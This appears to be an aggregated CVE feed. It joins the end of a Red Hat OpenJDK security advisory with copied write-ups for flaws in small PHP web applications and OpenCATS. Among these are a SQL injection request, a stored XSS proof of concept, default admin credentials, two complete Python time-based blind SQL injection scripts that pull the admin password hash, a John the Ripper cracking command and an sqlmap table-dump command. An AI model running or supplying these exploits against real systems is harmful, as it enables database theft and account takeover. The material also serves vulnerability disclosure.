java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_6.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.352.b08-2.el8_6.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_6.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.352.b08-2.el8_6.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.352.b08-2.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.352.b08-2.el8_6.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.352.b08-2.el8_6.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.352.b08-2.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21619  
https://access.redhat.com/security/cve/CVE-2022-21624  
https://access.redhat.com/security/cve/CVE-2022-21626  
https://access.redhat.com/security/cve/CVE-2022-21628  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1C5MNzjgjWX9erEAQjX+g/+LVBWbVKJBedf19M/NMdWPT9S90V6I/b9  
l4eWq9apoUGvRS4S6ba2qB1lS8og9jq+wWi5MInvtWyiKlvYdb038CQUkrFuMoDh  
KJWmw0iLkjrpOcFxu/eobmBfv0e7oUdYe2Z1Sz71AvtA06nGPUE5I/b+6nK2SMET  
Sol3DHvPt9JPAjAi1ZgR5LLjaoAaX9S/5VRSqLYxVMStsdc/gb15K+6c2/3SvG0L  
fwuepsXTbWNBntFde0X+xoV2lWP7FEiP73oTc/Ig0i1EdIYeO7cNSR7aC5vB7hYw  
3DQbsbscyfLKoTCJHPju/oJDD5b00DtQiXQSG+0QIxsRpQXQDfmKV/GGxfvbE+Ap  
1F4LRhjXUnv1MH/Pi3XUYwmhdL7JPpFpC3zzZJxXnK0HJ0aNn892FUvrsbt+w3sp  
1wVGnr+XN9rFYcdvr6luOOV9GX+x8+xglq9s079IFH5Z/W0M/uk/pGjcOQKUjUoa  
G00gQbau/PIwU8uf9KwFEbAGNfq3VwhXE+W1weYhQtkjvPyeN6G5iTRNZCrmU8m4  
dppu1nkg8oEC2vm1Kjn/kjcP3e9uDPvUWynp60sgPLv+OQb4hQfpwg6QMZp9mt8Y  
VsRLKly1xos4IhcY2lAvfKBRAvD36Z7S/ZUqq8eoCIxl5JwGANi7/gyAwoiyeHAX  
gbTiWTpeDmo=OLVd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7006-01

Best Student Result Management System v1.0 is vulnerable to SQL Injection via /upresult/upresult/notice-details.php?nid=.

\[+\] Payload: nid=2' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x61626364,0x31323334,0x71727374)-- - // Leak place ---> nid

    GET /upresult/upresult/notice-details.php?nid=2%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x61626364,0x31323334,0x71727374)--%20- HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=3thbvl3jh0h823b43vpautdf10
    Connection: close

CVE-2022-42021: bug_report/SQLi-1.md at main · 623085881/bug_report

Simple Exam Reviewer Management System v1.0 is vulnerable to Insecure file upload.

Submitted by oretnom23 on Saturday, February 5, 2022 - 17:22.

****Introduction****

This is a **Simple PHP** entitled **Exam Reviewer Management System**. This is a web-based application is an online platform for reviewing an Exam. It can be useful for schools, companies, organizations, etc. The system provides an answer sheet to the reviewers which have random questions that are possible to occur in the actual exam. The application has a small scope, simple, and is easy to use. It has a pleasant user interface and a mobile responsive at the public side of the system. The project has user-friendly features and functionalities.

****About the Exam Reviewer Management System****

I developed this project using the following:

*   **XAMPP v3.3.0** as my local webserver that has a **PHP Version 8.0.7**
*   **PHP Language**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **Bootstrap**
*   **AdminLTE**
*   and more...

The **Exam Reviewer Management System Project** has 2 sides of the user interface. One is the **Management Side** where the management can manage the Review Questionnaires, and one for the public side. The Public Side of the system is a simple website where the reviewers can read some content about the system, explore the exam reviewer list, and take the Exam to practice. The **Management Side** requires the users to log their system user credentials in order to access the features and functionalities of the said side. The management staffs are the ones who are in charge of managing the practice Test/Exam. This side can be only accessed by 2 types of users which are the **Administrator** and the **Staff**. The **Administrator** has the privilege to access and manage all the features and functionalities on the management side while the **Staff** have only limited access.

****Features********Management Side****

*   **Secure Login and Logout**
*   **Dashboard**
    *   Display the summary of lists.
*   **Exam Categories Management**
    *   Add New Lead Category
    *   List All Lead Categories
    *   View Lead Category
    *   Update Lead Category
    *   Delete Lead Category
*   **Exam Management**
    *   Add New Exam
    *   List All Exams
    *   View Exam
    *   Add Question
    *   List Questions
    *   Update Question
    *   Dynamically add/Remove Choices/Options in every Question
    *   Delete Question
    *   Update Exam
    *   Delete Exam
*   **Manage User List (CRUD)**
*   **Manage Account Details/Credentials**
*   **Manage System Information**

****Public-Side****

*   **Welcome Content**
*   **Exam Lists**
*   **Search Exam**
*   **View Exam Details**
*   **Take the Practice Exam**
*   **View the Practice Exam Result**
*   **'About' Content**

**System Snapshots of some Features****Practice Exam Details (Management Side)**

**Exam List (Public-Side)**

**Exam Details Modal (Public-Side)**

**Questionnaire (Public-Side)**

**Questionnaire - Mobile (Public-Side)**

**Result (Public-Side)**

**Result - Mobile (Public-Side)**

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****Installation/Setup****

1.  **Enable** or **Uncomment** the **GD Library** on your php.ini file.
2.  **Open** your **XAMPP/WAMP's Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****erms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****erms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Exam Reviewer Management System** in a **browser**. i.e. ****http://localhost/erms/****.

**Default Admin Access**

**Username:** admin  
**Password:** admin123

**DEMO VIDEO**

That's it. You can now explore the features and functionalities of this **Exam Reviewer Management System** in **PHP**. I hope this project will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   2679 views

CVE-2022-42201: Simple Exam Reviewer Management System in PHP/OOP Free Source Code

A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php.

**Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored XSS****Exploit Author: Sam Wallace****Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html****Version: 1.0****Tested on: Debian****ID: CVE-2022-41358****Summary:**

Garage Management System utilizes client side validation to prevent XSS. Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.

**When messages suggest that validation is occuring this is a good point in time to validate that these checks are also being completed server side.**

**This is the request prior to any modifications in Burp.**

**Perform a quick modification in Burp...**

**Profit!**

**Proof**

**POC**

    Parameter: categoriesName
    URI: /garage/php_action/createCategories.php
    

    Host: 10.24.0.69
    Content-Length: 367
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.24.0.69
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.24.0.69/garage/add-category.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
    Connection: close
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesName"
    
    <script>alert(1)</script>
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesStatus"
    
    1
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS--
    
    
    ![Alt text](/img/Intercept.png "Optional title")
    

**Reference:**

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41358

CVE-2022-41358: GitHub - thecasual/CVE-2022-41358

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag deletion function.

**SQL injection vulnerability in OpenCats 'Tag' deletion functionality.**

OpenCats version 0.9.6 PHP7.2 suffers from SQL injection vulnerability. This allows attackers control over the application's database.

User has control over tagID variable, which allows SQL injection in DELETE statement via time-based/blind techniques.

PoC: 

tagID variable is vulnerable. Similar query is build by application: DELETE FROM tag WHERE(tag_id = XXX OR tag_parent_id = 1) AND site_id = 1;

User can control XXX part. By asking many yes/no questions to the database user can differentiate between true and false statements. Using time-based blind technique attacker can exfiltrate data from entire database.

**PoC example:**

exfiltrate result of database() query:

blind-sql-demo.mp4**xploit.py**

import requests
import string
import sys

def inRange(rTime, averageTime, sleepAmount):
    if(rTime \> sleepAmount and rTime < rTime + (averageTime\*20/100) and rTime \> rTime \- (averageTime\*20/100)):
        return True
    else: return False

headers \= {}
proxies \= {}
#proxies\["http"\] = "http://127.0.0.1:8080"

#Login and get session cookie..
#Change this
headers\["Cookie"\] \= "CATS=cl2201l24aihqlnch0jgnr4pd2"
url \= "http://192.168.203.135/opencats/index.php?m=settings&a=ajax\_tags\_del"

#Prepare Content-Type for POST request compability
headers\["Content-Type"\] \= "application/x-www-form-urlencoded"
#Prepare POST parameter 'tag\_id'
postdata \= "tag\_id=PWN"

tempPayload \= "1 OR 1=(sleep(3))"

print("Sending few request to determine average response time...")

timeSum \= 0
numberOfBaselineRequests \= 5
for i in range(numberOfBaselineRequests):
    try:
        rTest \= requests.post(url, headers \= headers, data\=postdata.replace('PWN','1337'), proxies \= proxies) 
        timeSum  += rTest.elapsed.total\_seconds()
        if('<form name="loginForm"' in rTest.text):
            print("Session cookie not valid, change it inside .py")
            sys.exit(\-1)
        print("Iteration: " + str(i+1) + ". Response time in seconds: " + str(rTest.elapsed.total\_seconds()))
    except:
        print("Some exception ocurred while sending or receiving data from the application. Make sure IP is good. Exiting..")
        sys.exit(\-1)

averageTime \= timeSum/numberOfBaselineRequests
print("Average response time for " + str(numberOfBaselineRequests) + " requests is : " + str(averageTime))

print("\\nTrying to inject sleep(3)")
r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload), proxies \= proxies)
rTime \= r.elapsed.total\_seconds()
print("Response time: " + str(rTime))

if(inRange(rTime, averageTime, 3)):
    print("\\n\[+\] Application is vulnerable to SQL injection...")

#Getting value for false statement -> sleep(1)
tempPayload2 \= "1 or 1=(sleep(0.1))"
r2 \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload2), proxies \= proxies)
t\_sleep\_one \= r2.elapsed.total\_seconds()

tempPayload3 \= "1 or 1=(sleep(0.3))"
r3 \= requests.post(url, headers \= headers, data\=postdata.replace('PWN', tempPayload3), proxies \= proxies)
t\_sleep\_three \= r3.elapsed.total\_seconds()

print("False statement time: " + str(t\_sleep\_one))
print("True statement time: " + str(t\_sleep\_three) + "\\n")

length \= 0
exfilQuery \= "1 OR 1=(IF(length(database())='XXX',sleep(0.3),sleep(0.1)))"
#Determine length of the result that we want. i.e database() function..
while(True):
    q \= exfilQuery.replace('XXX', str(length))
    r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN', q))
    time \= r.elapsed.total\_seconds()
        
    print("Length : " + str(length) + ". Time: " + str(time))

    #If sleep(3) gets executed, we have correct length
    if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
        print("Got length " + str(length))
        break
    
    length += 1
    if(length \== 1000):
        break
    
if(length \== 0 or length \== 1000):
    print("Something is wrong. Exiting...")
    sys.exit(\-1)
else: print("Length of 'database()' query: " + str(length))

#OK----|
alphanumerics \= list(string.ascii\_lowercase + string.ascii\_uppercase + string.digits)
exfilQuery \= "1 OR 1=(IF(substr(database(),YYY,1) = 'XXX',sleep(0.3), sleep(0.1)))"

data \= \[\]
for i in range(length):
    for item in alphanumerics:
        q \= exfilQuery.replace('XXX',str(item))
        q \= q.replace('YYY',str(i+1))
        print(q)
        r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',q), proxies \= proxies)
        time \= r.elapsed.total\_seconds()
        print(str(time) + "\\n")
        if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
            print(str(i+1) + ". Letter = " + item)
            data.append(item)
            break

print("database() -> " + "".join(data))

CVE-2022-43022: opencats_zero-days/SQLI_tag_deletion.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the entriesPerPage variable.

**SQL injection vulnerability in OpenCats 'Job Orders'**

OpenCats version 0.9.6 PHP7.2 suffers from SQL injection vulnerability. This allows attackers control over the application's database.

User has control over entriesPerPage variable, which allows SQL injection in UPDATE statement, setPipelineEntriesPerPage function call.

SQL query code:

Since UPDATE statement is used to query the database, user can add arbitrary values to arbitrary columns inside 'user' table. Knowing this, it is possible to craft payload like: 15,first_name=(select password from user where user_id=1 limit 1)

This will update 'first\_name' with arbitrary data from database. In this example user's password hash will be written inside first\_name column. Since, first name is reflected in many endpoints in application, this means malicious person can exfiltrate data and control the database using it as a field to extract data. Attackers can also use blind sql injection techniques to extract db information.

CVE-2022-43021: opencats_zero-days/SQLI_JobOrders.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag update function.

**SQL injection vulnerability in OpenCats 'Tag' update functionality.**

OpenCats version 0.9.6 PHP7.2 suffers from SQL injection vulnerability. This allows attackers control over the application's database.

User has control over tag\_id variable, which allows SQL injection in UPDATE statement via time-based/blind techniques.

Application builds the following query:  
UPDATE tag SET title = 'Title', description = 'Description' WHERE tag_id = XXX AND site_id = 1;

User has control over XXX part.

1337 OR 1337=(select IF(substr(database(),1,1)='a',(select sleep(3)), (select sleep(1)))))

With this payload, application will sleep for 3 seconds for every entry inside original table if the database() query result starts with 'a', otherwise it will sleep for one second.

With this time-based blind technique, attacker is able to exfiltrate any information from the database by querying many YES/NO questions to the database and intelligently measuring response times.

**POC**

This proof of concept exfiltrates administrator user's password hash:  
(select password from user where user_id=1)

**Bonus, let's crack the hash**

echo "password:21232f297a57a5a743894a0e4a801fc3" > hash.txt  
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt

**xploit.py!**

import requests
import string
import sys

def inRange(rTime, averageTime, sleepAmount):
    if(rTime \> sleepAmount and rTime < rTime + (averageTime\*20/100) and rTime \> rTime \- (averageTime\*20/100)):
        return True
    else: return False

headers \= {}
proxies \= {}
#proxies\["http"\] = "http://127.0.0.1:8080"

#Login and get session cookie..
#Change this
headers\["Cookie"\] \= "CATS=cl2201l24aihqlnch0jgnr4pd2"
url \= "http://192.168.203.135/opencats/index.php?m=settings&a=ajax\_tags\_upd"

#Prepare Content-Type for POST request compability
headers\["Content-Type"\] \= "application/x-www-form-urlencoded"
#Prepare POST parameter 'tag\_id'
postdata \= "tag\_id=PWN&tag\_title=test"

#Change this depending on the endpoint
tempPayload \= "1 OR 1=(sleep(3))"

print("Sending few request to determine average response time...")

timeSum \= 0
numberOfBaselineRequests \= 5
for i in range(numberOfBaselineRequests):
    try:
        rTest \= requests.post(url, headers \= headers, data\=postdata.replace('PWN','1337'), proxies \= proxies) 
        timeSum  += rTest.elapsed.total\_seconds()
        if('<form name="loginForm"' in rTest.text):
            print("Session cookie not valid, change it inside .py")
            sys.exit(\-1)
    except:
        print("Some exception ocurred while sending or receiving data from the application. Make sure IP is good. Exiting..")
        sys.exit(\-1)

averageTime \= timeSum/numberOfBaselineRequests
print("Average response time for " + str(numberOfBaselineRequests) + " requests is : " + str(averageTime))

print("\\nTrying to inject sleep(3)")
r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload), proxies \= proxies)
rTime \= r.elapsed.total\_seconds()
print("Response time: " + str(rTime))

if(inRange(rTime, averageTime, 3)):
    print("\\n\[+\] Application is vulnerable to SQL injection...")

#Getting value for false statement -> sleep(1)
tempPayload2 \= "1 or 1=(sleep(0.1))"
r2 \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload2), proxies \= proxies)
t\_sleep\_one \= r2.elapsed.total\_seconds()

tempPayload3 \= "1 or 1=(sleep(0.3))"
r3 \= requests.post(url, headers \= headers, data\=postdata.replace('PWN', tempPayload3), proxies \= proxies)
t\_sleep\_three \= r3.elapsed.total\_seconds()

print("False statement time: " + str(t\_sleep\_one))
print("True statement time: " + str(t\_sleep\_three) + "\\n")

length \= 0
exfilQuery \= "1 OR 1=(IF(length((select password from user where user\_id=1))='XXX',sleep(0.3),sleep(0.1)))"
#Determine length of the result that we want. i.e select passwrod from user query...
print("Determining the result length of our query...")

while(True):
    q \= exfilQuery.replace('XXX', str(length))
    r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN', q))
    time \= r.elapsed.total\_seconds()

    #If sleep(3) gets executed, we have correct length
    if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
        print("Got length " + str(length))
        break
    
    length += 1
    if(length \== 1000):
        break
    
if(length \== 0 or length \== 1000):
    print("Something is wrong. Exiting...")
    sys.exit(\-1)
else: print("Length of '(select password from user where user\_id=1)' query: " + str(length))

#OK----|
alphanumerics \= list(string.ascii\_lowercase + string.digits)
exfilQuery \= "1 OR 1=(IF(substr((select password from user where user\_id=1),YYY,1) = 'XXX',sleep(0.3), sleep(0.1)))"

data \= \[\]
print("Exfiltrating data. Query: (select password from user where user\_id=1). Patience...")

for i in range(length):
    for item in alphanumerics:
        q \= exfilQuery.replace('XXX',str(item))
        q \= q.replace('YYY',str(i+1))
        r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',q), proxies \= proxies)
        time \= r.elapsed.total\_seconds()
        #print(str(time) + "\\n")
        if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
            print(str(i+1) + ". Letter = " + item)
            data.append(item)
            break

print("(select password from user where user\_id=1) -> " + "".join(data))

CVE-2022-43020: opencats_zero-days/SQLI_in_Tag_Updates.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the importID parameter in the Import viewerrors function.

Permalink

Cannot retrieve contributors at this time

**SQL injection vulnerability in OpenCats 'Import viewerrors' functionality.**

OpenCats version 0.9.6 PHP7.2 suffers from SQL injection vulnerability. This allows attackers control over the application's database.

User has control over data that gets passed inside SQL query, which allows SQL injection in SELECT statement via GET 'importID' parameter.

#Poc Decided to test this with sqlmap. Let's exfiltrate username and password hashes from the database.

    sqlmap -u "http://192.168.203.135/opencats/index.php?m=import&a=viewerrors&importID=1" --cookie="CATS=cl2201l24aihqlnch0jgnr4pd2" -T user -C user_id,user_name,password -p "importID" --flush-session --dump
    

04.10.2022\_00.44.40\_REC.mp4

Tag

#sql